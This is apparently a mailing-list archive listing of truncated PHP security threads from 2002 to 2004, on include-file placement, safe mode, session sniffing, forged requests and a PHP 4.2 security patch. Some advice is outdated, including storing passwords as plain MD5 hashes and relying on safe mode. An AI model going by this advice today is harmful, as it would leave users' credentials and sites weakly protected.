On Wed, 15 Sep 2004 12:47:05 -0400, H. Ch. Esperer
[EMAIL PROTECTED] wrote:
I have an apaci 1.3 and php 5.0.1 running on my machine and when I enter a url in a
browser without a slash at the end of it I get the php script(!) instead of its
output. When I add a slash, it works all right.
Has
--- Dan Joseph [EMAIL PROTECTED] wrote:
I am in the process of wrapping up a site for a friend of mine.
It has logins, searching, account information, etc. I am
wondering, does anyone on the list do any security auditing on
the side? Chris, maybe you?
Yes, but I might not be a good choice,
Scott Fletcher wrote:
Saw a website about security vulerability and there's no info on php.net
that can describe more about it. So, anyone know?
http://pcworld.co.nz/news.nsf/0/4D6AE0157B37ACDCCC256ED200693BB3?OpenDocument
One more reason to not use strip_tags... like I really needed another,
John W. Holmes mailto:[EMAIL PROTECTED]
on Friday, May 28, 2004 11:25 PM said:
You're right. Option 2 offers more security in that no one will ever
be able to reach the file directly with a web browser. You don't need
to use file() or file_get_contents(), though... A simple
Chris W. Parker
on Tuesday, June 01, 2004 8:12 AM said:
how about just calling 'db.php' so that when someone does request it
via a web browser it will be parsed and end up not sending any data
to the client?
that should read, just calling *it* 'db.php', regarding the name of
the file
From: Chris W. Parker [EMAIL PROTECTED]
You're right. Option 2 offers more security in that no one will ever
be able to reach the file directly with a web browser. You don't need
to use file() or file_get_contents(), though... A simple
include('../includes/db.inc'); wil work (where ../
John W. Holmes mailto:[EMAIL PROTECTED]
on Tuesday, June 01, 2004 8:29 AM said:
We'll call that Option 3, which is a viable option if you cannot do
Option 2 (store outside of webroot). The problems with this method is
that if PHP ever fails for any reason, the file may be delivered as
Dennis Seavers wrote:
Option 1: Include the mysql_connect and mysql_select_db
commands within the script that manipulates the data from
the database.
Option 2: Include the mysql_connect and mysql_select_db
commands (along with usernames and passwords) outside the
Web tree, but have the script
From: Andy B [EMAIL PROTECTED]
im writing this admin system for a website and need to have it write
system
logs to its own log files... the only problem i can really see is that its
on a shared webserver and all files are restricted to your own
domain/vhost
dirs (whatever those happen to be).
You don't have access to anything outside of the webroot? If
/home/user/www/
is your webroot, then write them to /home/user/. If you're saying you
can't
do that and they have to be put under the webroot, then give them .php
extensions and make the first line
?php exit(); ?
Then they can't
On 20 February 2004 22:29, Ed Lazor wrote:
PHP include statements default to the current directory. If
the path to
my PHP files is /home/osmosis/public_html, why would users visiting my
site occasionally get an error that the include file wasn't found in
/home/budguy/public_html?
It's
Ed Lazor mailto:[EMAIL PROTECTED]
on Friday, February 20, 2004 2:29 PM said:
It's like PHP is somehow confused and running my script with the
account settings (and permissions, possibly) for another user on my
host provider's server. If that's true, wouldn't this quality as a
security
You're not being rude. I contacted them immediately about the script
errors and described what seemed to be a security hole. The tech I
spoke with didn't know what I was talking about, so I asked them to
notify the owner of the problem and that I'd research it more and let
them know of anything
Hi Chris,
First of all, thanks a lot for sharing your modus operandi with us.
On 14 Jan 2004 at 7:32, Chris W wrote:
I then verify that every character in the string is with in the ascii
range of a space to the ~ which is basically all the characters on the
key board.
How exactly are you
[EMAIL PROTECTED] wrote:
Hi Chris,
First of all, thanks a lot for sharing your modus operandi with us.
On 14 Jan 2004 at 7:32, Chris W wrote:
I then verify that every character in the string is with in the ascii
range of a space to the ~ which is basically all the characters on the
key board.
On Thu, 18 Dec 2003 10:43:14 -0500, you wrote:
I'm trying to develop a secure web based application and my only tools are
php, mysql, and a SSL connection.
Does anyone know of any good references for this kind of development?
What I really need to do is to make sure that given users only gain
If you want this type of level security, you should work under SSL connection, that
works with crypted data between browser and server.
Javier Tacón
-Mensaje original-
De: Neale Yates [mailto:[EMAIL PROTECTED]
Enviado el: lunes, 15 de septiembre de 2003 7:47
Para: [EMAIL PROTECTED]
Nabil [EMAIL PROTECTED] wrote:
I have an Linux server running Apache/PHP/MySQL.
and I need to connect to another server running MSSQL server 7
THE POINT IS the only way I have to connect is throu ODBC connection
because the network administrator only allowed me to connect thru port 1433
Justin,
Tks for your reply -- you're partially correct in how it works, and thus
far I've not used session id's. Cool.
Login is built into the Flash movie and calls a PHP script to authenticate,
which returns appropriate success/fail data to the movie. Everything is
buried in the Flash movie
Ok, I'm trying to get a grip on what happens here:
1. i visit your site, see a flash movie, which enables me to log-in
2. after i log in, I see a link called news
3. I click on it, which pops open a HTML window through javascript, with a
URL like example.com/print_news.php
[At this point, the
It should not be too difficult to change the delphi utility to post a
sql or csv file to a php script, in the script you can check the sql
commands and then execute them or parse the csv file respectively. The
password is not really hidden, maybe it is not even scrambled in the
binary, and can
Thanks. Looks like a properly configured safe mode could eliminate a
lot of problems. A few follow-up questions:
1. I see in the PHP doc comments a patch for Apache
(http://luxik.cdi.cz/~devik/apache/) that runs different virtual hosts
as different users. Anyone know anything about it, in
OK, my question #2 below is answered by the docs: Safe mode disabled
the backtick operator. But having turned on safe mode on my local test
server, I have another question: Suddenly my include statements that
user relative paths don't work. For example:
include
If your hosting provider has enabled safe mode then others can not
include scripts that have a different uid than the owner of the current
script, that prevents them from including your code.
As far as the files go you could checksum them or if you are honestly
concerned about them being changed
Remove me from your list
-Original Message-
From: Jani Taskinen [mailto:[EMAIL PROTECTED]]
Sent: Monday, February 17, 2003 12:01 PM
To: [EMAIL PROTECTED]; [EMAIL PROTECTED];
[EMAIL PROTECTED]
Subject: PHP Security Advisory: CGI vulnerability in PHP version 4.3.0
-BEGIN PGP SIGNED
On Mon, 17 Feb 2003, McKinney, Rod ERM wrote:
Remove me from your list
See the footer of this email:
--
PHP Development Mailing List http://www.php.net/
To unsubscribe, visit: http://www.php.net/unsub.php
Derick
--
Stop mad cowboy disease!
Ananth Kesari [EMAIL PROTECTED] wrote... :
Thanks for your inputs. Will proceed from here.
Well, if you did not know, NetWare is an operating system brought out
by Novell.
I know :)
We are working on porting PHP onto NetWare. In fact, we
already have ported PHP 4.2.3 onto NetWare and
Ananth Kesari [EMAIL PROTECTED] wrote... :
I am working on porting PHP onto NetWare.
What exactly do you mean?
I am newbie to Unix / Linux systems and at this point of time, I am
trying to understand the way security is implemented for PHP on Unix /
Linux. I mean, how are the different
Ananth,
For starters, you are probably on the wrong list - the PHP developers list
is probably where you should be asking this question.
Second, PHP runs through the web server, so the user is the same user the
web server, usually nobody, although that depends on the how the web
server is
--- Miles Thompson [EMAIL PROTECTED] wrote:
Ananth,
For starters, you are probably on the wrong list -
the PHP developers list is probably where you should
be asking this question.
Please do not go around saying this. We have enough
problems with these types of posts winding up on php-dev
Thanks for your inputs. Will proceed from here.
Well, if you did not know, NetWare is an operating system brought out
by Novell. We are working on porting PHP onto NetWare. In fact, we
already have ported PHP 4.2.3 onto NetWare and we have synched up our
souces for the 4.3 branch.
Thanks,
Thanks for your inputs. Will proceed from here.
Well, I first posted this query on this list. But seeing no response, I
thought probably it should have gone into PHP-dev list. When I posted
there, I was discouraged to post such mails there. So, I came back to
the general list.
Thanks,
Ananth.
I guess you use some webserver, let's take apache.
Apache's mime.conf has set several extensions,
also php extensions. So only .php, .php3, .php4
files will be parsed by php.
Chad Day wrote:
I want to give my users the ability to submit a URL to a database, then when
they pull up their page,
--- Chad Day [EMAIL PROTECTED] wrote:
I want to give my users the ability to submit a URL
to a database, then when they pull up their page,
their photo is included .. what I'm worried about
is them pointing the link to some malicious code or
something..
Your instincts serve you well.
There
Chris Shiflett wrote:
--- Chad Day [EMAIL PROTECTED] wrote:
I want to give my users the ability to submit a URL
to a database, then when they pull up their page,
their photo is included .. what I'm worried about
is them pointing the link to some malicious code or
something..
Your instincts
On Wednesday 22 January 2003 01:40, Sean Burlington wrote:
is there really any site which will accept a book order based an a sigle
GET ?
Amazon makes a big deal of their one-click shopping feature. It's so good
they've even patented it.
--
Jason Wong - Gremlins Associates -
Gibbs, Liam - SXIA wrote:
I agree that there are risks - but I do think this can be done safely
Couldn't you just check the submitted URL and find out if it's a gif or
jpeg? I don't think even PHP-enabled servers will run a gif or jpeg.
please send replies to the list ...
and you cant
--- Sean Burlington [EMAIL PROTECTED] wrote:
I'm not sure what harm could be done by this though.
if a broswer attempts to load an image reference by
an img tag - but finds an unsuitable type of data -
I would expect it simply to ignore it...
I sent a response about this earlier, but you
--- Sean Burlington [EMAIL PROTECTED] wrote:
is there really any site which will accept a book
order based an a sigle GET?
Well, yes, but that is not the point really. The example of
the img tag is just one way you can forge an HTTP request
from another user (the victim).
Also consider that
Chris Shiflett wrote:
--- Sean Burlington [EMAIL PROTECTED] wrote:
I'm not sure what harm could be done by this though.
if a broswer attempts to load an image reference by
an img tag - but finds an unsuitable type of data -
I would expect it simply to ignore it...
I sent a response about
--- Phil Ewington [EMAIL PROTECTED] wrote:
Can PHP be configured to allow certain web sites
access to files and directories within their web
root only?
I would suggest looking into safe mode. It sounds like it
may work for you:
http://www.php.net/manual/en/features.safe-mode.php
Chris
--
True. But let's just call me anal retentive. :-) Let's say I didn't have the
option of doing what you suggested. Are my ideas sound? Also, those ideas
apply to top-level PHP scripts in an application.
Jacob
Kevin Stone [EMAIL PROTECTED] wrote in message
--- Jacob Copsey [EMAIL PROTECTED] wrote:
My style of PHP is to name all included files with a .php
extension and of course this raises the problem of people
accessing these script files directly.
I always name included files *.inc myself, but that's a
personal preference combined with a
I agree these are good solutions and I have considered them. However, I am
looking for an all-inclusive solution that is code only within PHP that
allows the admin of the application to copy the files to their server and
not need to do any server specific configuration. That is why I don't name
Have you thought about moving your include files outside of the web
directory?
i.e.If your site is in ../apache/htdocs/web/mywbsite_folder
then move your include files to ../apache/my_include_folder/ or something
similar.
-john
=P e p i e D e s i g n s
www.pepiedesigns.com
Providing
--- Jacob Copsey [EMAIL PROTECTED] wrote:
I agree these are good solutions and I have considered
them. However, I am looking for an all-inclusive
solution that is code only within PHP that allows the
admin of the application to copy the files to their
server and not need to do any server
/
-Original Message-
From: Jacob Copsey [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, January 15, 2003 3:53 PM
To: [EMAIL PROTECTED]
Subject: Re: [PHP] Security in included PHP files
I agree these are good solutions and I have considered them. However,
I am
looking for an all
I am beginning work on a new web-based application using PHP and
MySQL. I
have been doing a lot of reading about PHP security and web
application
security in general to make sure I am up-to-date on what is known in
this
area.
My style of PHP is to name all included files with a .php
Message-
From: Jacob Copsey [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, January 15, 2003 3:53 PM
To: [EMAIL PROTECTED]
Subject: Re: [PHP] Security in included PHP files
I agree these are good solutions and I have considered them. However,
I am
looking for an all-inclusive
On Sunday 05 January 2003 01:16, Anders Thoresson wrote:
I've seen both guest books and user forums hacked by users who enter
javascript or other code, and that way redirects vistors to other sites or
do other unwelcome things. What expressions should I look for and not allow
in my forms?
on 05/01/03 4:16 AM, Anders Thoresson ([EMAIL PROTECTED]) wrote:
I've seen both guest books and user forums hacked by users who enter
javascript or other code, and that way redirects vistors to other sites or
do other unwelcome things. What expressions should I look for and not allow
in my
Hi gamin,
Running Red Hat 7.2, PHP 4.0.6. Is there any way of knowing if a
certain
PHP script was run from the command line, shell script or through the
webserver (Apache). May be i could check the user calling the script and
find out but how would i do that ?
There is a difference in
Hello,
SED [EMAIL PROTECTED] wrote:
When I use sessions in PHP or just plain login/password in $_POST, can
3rd parties or hackers monitor the transmission, between me and user,
and somehow decode the transmission and use the variables to login other
time or overtake the current session?
Yes.
Yes,
Between user and server, everydata pass through DNS, routeur, etc...
So if you don't want someone (hackers or FBI of CIA) to decode your data,
use SSL server (https://) with certificate-
- Original Message -
From: SED [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Saturday, November
Thank you for the reply, what do you mean by sniffing, do you mean
everbody can monitor our browsing?
-Original Message-
From: @ Edwin [mailto:copperwalls;hotmail.com]
Sent: 1. nóvember 2002 21:47
To: SED
Cc: [EMAIL PROTECTED]
Subject: Re: [PHP] Security - Maybe a silly question
Hello
: [EMAIL PROTECTED]
website: www.sed.is
-Original Message-
From: rija [mailto:rija;vatu.com]
Sent: 1. nóvember 2002 22:33
To: php; SED
Subject: Re: [PHP] Security - Maybe a silly question
Yes,
Between user and server, everydata pass through DNS, routeur, etc... So
if you don't want
Hello SED,
SED [EMAIL PROTECTED] wrote:
Thank you for the reply, what do you mean by sniffing, do you mean
everbody can monitor our browsing?
I'm not really sure how I can answer your question but let me just put it
this way.
Everybody CAN monitor our browsing but:
1. That doesn't mean
SED [EMAIL PROTECTED] wrote:
I'm not very familiar to this stuff, but if I wanna use https:// do
don't I need a key from Verisign (or similar) to make it work?
Yes and no. If you're going to use it on a production server, yes.
If it's on a test server but you still want to be somehow
SED wrote:
When I use sessions in PHP or just plain login/password in $_POST, can
3rd parties or hackers monitor the transmission, between me and user,
and somehow decode the transmission and use the variables to login other
time or overtake the current session?
If so, how likely is for someone
Having recently switched from php 4.0.0 to 4.2.3 I quickly realized
the
change in variable handling. I still experience problems using the
$_POST
and $_GET globals so I currently have my register globals ON so I can
have
the ability to pass variables from page to page without using the
$_POST
Correct! Problem is that I have been given explicit instructions to not
use cookies to do this. The only way I can think of doing it without
using cokkies is to pass at least one variable from page to page so the
scripts know who the user is. Getting them to the user index page with
links to
Correct! Problem is that I have been given explicit instructions to
not
use cookies to do this. The only way I can think of doing it without
using cokkies is to pass at least one variable from page to page so
the
scripts know who the user is. Getting them to the user index page with
links
It would be possible to do this if I then created another table to load
their profile data to and use the unique id as the identifier. It would
make it alot harder for someone to guess an ID. I would then need a way to
flush out their records from the second table when they are finished.
Easily
It would be possible to do this if I then created another table to
load
their profile data to and use the unique id as the identifier. It
would
make it alot harder for someone to guess an ID. I would then need a
way to
flush out their records from the second table when they are finished.
I think I would rather do it using a new table than have to handle
sessions. It actually sounds harder to do it this way but I like hard. :)
Thanks,
Ed
On Mon, 30 Sep 2002, John W. Holmes wrote:
It would be possible to do this if I then created another table to
load
their profile data
At 04:12 PM 8/12/2002 +0100, Pag wrote:
Here is my humble, but relatively effective solution for a low security site.
Create a file called security.php and require it at the head of every
secure page. This is the one I use.
?
session_start();
if(!session_is_registered(userinfo))
{
If it's simple security then you might want to use an .htaccess file instead
of coding something.
More complex solutions involve asking the user for credentials, validating
those credentials and then storing something in the $_SESSION that indicates
that this user has been validated.
It can be
On Fri, Aug 09, 2002 at 10:10:28PM +0200, Andy wrote:
[curl]
So I fear that someone would be able to tranfer files on / off my server.
Has anybody some experiance on that, or can give a comment on that?
Ehhh, PHP already has enough capabilities to transfer files to/from your
server from/to
So I fear that someone would be able to tranfer files on / off my
server.
Has anybody some experiance on that, or can give a comment on that?
Ehhh, PHP already has enough capabilities to transfer files to/from your
server from/to the rest of the world without using curl. Or are you
On Wed, 24 Jul 2002, Scott Fletcher wrote:
It work very nicely The whole process take 30 to 45 minutes for just
one server. I wonder how does someone did 12 computers in 10 minutes.
Cool!
cd /usr/src/local
tar -zxf php-4.2.2.tar.gz
cd php-4.2.2
../php-4.2.1/config.nice
make
Hmmm, interesting I didn't know about this and didn't see it in the
docs. So now I know for my next upgrade.
Anyway, my upgrade is in, and through the mails it should be clear to those
who thought how terribly difficult and time consuming it is/was to do the
upgrades that it was in fact
ay, July 23, 2002 12:43 PM
To: [EMAIL PROTECTED]
Subject: Re: [PHP] Re: PHP Security Advisory: Vulnerability
in PHP versions 4.2.0
I don't know how to appy patches to the PHP software. I just finish
upgrading the website to work with PHP 4.2.1 from PHP 4.0.6. And now
this
015B38DA@hsus3...
From: Scott Fletcher [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, July 23, 2002 12:43 PM
To: [EMAIL PROTECTED]
Subject: Re: [PHP] Re: PHP Security Advisory: Vulnerability
in PHP versions 4.2.0
I don't know how to appy patches to the PHP software. I just finish
u
On Wednesday 24 July 2002 22:22, Scott Fletcher wrote:
It work very nicely The whole process take 30 to 45 minutes for just
one server.
You've got a slow computer and/or you type too slow ;-)
I wonder how does someone did 12 computers in 10 minutes.
Cool!
For me it was a case of
At 10:22 AM 7/24/02 -0400, Scott Fletcher wrote:
It work very nicely The whole process take 30 to 45 minutes for just
one server. I wonder how does someone did 12 computers in 10 minutes.
Cool!
For me the key to upgrading many servers is to compile once then copy the
resulting files to
I don't know how to appy patches to the PHP software. I just finish
upgrading the website to work with PHP 4.2.1 from PHP 4.0.6. And now
this So, just patched it then configure openssl, mycrypt, curl, modssl
then do the usual stuff for PHP then apache, right??
Adam Alkins [EMAIL
Amended to this recent posting. Already started a new posting from scratch.
Scott Fletcher [EMAIL PROTECTED] wrote in message
[EMAIL PROTECTED]">news:[EMAIL PROTECTED]...
I don't know how to appy patches to the PHP software. I just finish
upgrading the website to work with PHP 4.2.1 from PHP
From: Scott Fletcher [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, July 23, 2002 12:43 PM
To: [EMAIL PROTECTED]
Subject: Re: [PHP] Re: PHP Security Advisory: Vulnerability
in PHP versions 4.2.0
I don't know how to appy patches to the PHP software. I just finish
upgrading the website
Ian Ball [EMAIL PROTECTED] wrote in message
[EMAIL PROTECTED]">news:[EMAIL PROTECTED]...
patch -p0 php-4.2.1-to-4.2.2.patch
cd php-4.2.1
./configure --with-mysql --with-apxs=/usr/local/apache/bin/apxs --with-ldap
make
make install
/usr/local/apache/bin/apachectl restart
Hmm...is the
If all you're doing is applying the patch (not adding/removing any
extensions), you should be able to use
./config.nice
which will use all of the configuration commands from your last compile
(This is an extremely handy thing if your GD/Freetype setup was particularly
ornery the first time
The correct path for the windows binary version is
http://www.php.net/do_download.php?download_file=php-4.2.2-Win32.zip
/lasso ([EMAIL PROTECTED])
Rouvas Stathis wrote:
Hi all,
Just wanting to notify everyone that
the link for the PHP.4.2.2 download is broken.
-Stathis.
--
PHP
Can you post this to php.announce as well?
Marko Karppinen wrote:
PHP Security Advisory: Vulnerability in PHP versions 4.2.0 and 4.2.1
Issued on: July 22, 2002
Software: PHP versions 4.2.0 and 4.2.1
Platforms: All
The PHP Group has learned of a serious security
Hi all,
Just wanting to notify everyone that
the link for the PHP.4.2.2 download is broken.
-Stathis.
--
Rouvas Stathis
[EMAIL PROTECTED]
http://www.di.uoa.gr/~rouvas
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Yes. Please post something to php.announce! Nothing ever gets announced in
there anymore.
Steve Meyers [EMAIL PROTECTED] wrote in message
[EMAIL PROTECTED]">news:[EMAIL PROTECTED]...
Can you post this to php.announce as well?
Marko Karppinen wrote:
PHP Security Advisory:
[delete some flaming]
Hehe, and I thought I had to go to USENET to see a flamewar. This is great,
a flamewar delivered directly to my mailbox, it doesn't get better...
Let me put my $0.02 in. Security holes happen, no matter what software you
use. PHP and open source in general,
Any real programmer should know that almost nothing is bug free, even if you
test it beyond your imagination. Something is always going to elude you and
be found by someone experimenting down the road.
For the widespread use of PHP, I'm rather impressed by the small amount of
vunerabilities
Hi ...
I want to be warned about php security issues, I couldn't find
an exact match in the mailing list names ... which one do you
recommend me?
I believe that the Announce list would have any critical security warnings
sent to it.
It's also very low-volume.
--
Like Music?
Hello,
On 07/22/2002 08:07 PM, Dario Bahena Tapia wrote:
Hi ...
I want to be warned about php security issues, I couldn't find
an exact match in the mailing list names ... which one do you
recommend me?
http://www.phpadvisory.com/ is what you are looking for.
--
Regards,
Manuel Lemos
You could store passwords as MD5 hashes which of course is NOT really
encryption, but it would obfuscate the users' passwords. They would still
be vulnerable to social engineering (Hmm, I'll try his wife's name, then
his dog's name, then his phone#, etc) and brute force (I'm going to run
every
Are you telling me that you cannot look at
37b51d194a7513e45b56f6524f2d51f2 and see that the is the same as bar?
... Just kidding.
Thanks for the tip, that makes a lot of sense.
Andrew Chase [EMAIL PROTECTED] wrote in message
[EMAIL PROTECTED]">news:[EMAIL PROTECTED]...
You could store
on 03/07/02 11:36 PM, Jean-Christian Imbeault ([EMAIL PROTECTED])
wrote:
In general how does one go about hardening a PHP script. i.e. making it
as hacker-proof as possible. General things like:
I think the general answer is you can't, but you can make it more secure.
- verifying user
Jean-Christian Imbeault wrote:
I'm writing my first commercial site and of course I am thinking about
security. I'm worried about someone using a flaw in my PHP script
logic to access information they shouldn't.
I've read the PHP books I have and Googled around but can't quite find
Chris Shiflett wrote:
Jean-Christian Imbeault wrote:
In general how does one go about hardening a PHP script. i.e. making
it as hacker-proof as possible
There is no such thing as a 100% secure solution (this applies to
everything running on a computer, PHP included). But basically you can
Justin French wrote:
This list really does work best (ie best results for you) if you come
to us
with a specific problem, rather than something general.
I totally agree. Sorry to have asked such a wide question but in this
case it is a bit of a chicken-or-the-egg situation. To make your
On Tuesday, June 25, 2002, at 08:26 PM, Analysis Solutions wrote:
I usually run PHP as CGI. My secure files are kept in a directory
that's
not under the */docroot. Thus, they can't be gotten to through the web
server at all. Plus, the secure files are chmoded 600 (which means they
On Tuesday, June 25, 2002, at 08:26 PM, Analysis Solutions wrote:
I usually run PHP as CGI. My secure files are kept in a directory
that's
not under the */docroot. Thus, they can't be gotten to through the
web
server at all. Plus, the secure files are chmoded 600 (which means
they
No. The only way they can get your source is by ftping or having shell
access to your server. And even then, they'd have to have read perms on
your web folder/files. If you were to have a lot of unknown people
jacking around on your server, you have a lot of other stuff to worry
about that
On Tuesday, June 25, 2002, at 03:46 PM, Peter wrote:
When you have the standard
$link = mysql_connect(localhost,username,secretpassword);
Would it not be possible for someone to use PHP from another server to
download your source and find out your MySQL details including password?
Yes.
On Tuesday, June 25, 2002, at 03:46 PM, Peter wrote:
When you have the standard
$link = mysql_connect(localhost,username,secretpassword);
Would it not be possible for someone to use PHP from another server to
download your source and find out your MySQL details including password?
That's a big can of worms :)
I think perhaps start with one problem, like sessions, then move onto
another problem.
Not really sure what you mean by cross site scripting... maybe you mean
writing decent code once, and having it portable to many new projects with
little fuss?
Justin French
301 - 400 of 497 matches
Mail list logo